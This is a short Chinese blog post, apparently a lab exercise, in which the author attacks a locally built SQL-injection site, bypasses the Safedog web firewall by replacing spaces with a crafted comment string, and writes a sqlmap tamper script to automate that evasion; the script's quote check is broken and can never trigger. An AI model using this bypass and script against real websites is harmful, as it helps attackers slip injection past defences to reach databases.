sqlmap过狗脚本练习1

本地搭建sql注入网站练习

测试安全狗,输入不合法参数被安全狗拦截:

使用sqlmap:

检测到防护机制,失败;

先手工尝试绕过安全狗:

将空格替换为  “/*//\*//\*\/c*/” 成功绕过安全狗;

写个sqlmap脚本:

#demo.py
def tamper(payload,**kwargs):
    retVal = payload
    quote=False
    if payload:
        retVal = ''
        for i in payload:
            if i =="'" and i=='"':
                quote = not quote
            elif i.isspace() and not quote:
                retVal+='/*//\*//\*\/c*/'
            else:
                retVal+=i
    return retVal

加上脚本继续跑:

成功!(之后试了几次就不行了,与安全狗的检测机制有关。。。)

 

posted @ 2020-05-27 13:31  -ME  阅读(225)  评论(0)    收藏  举报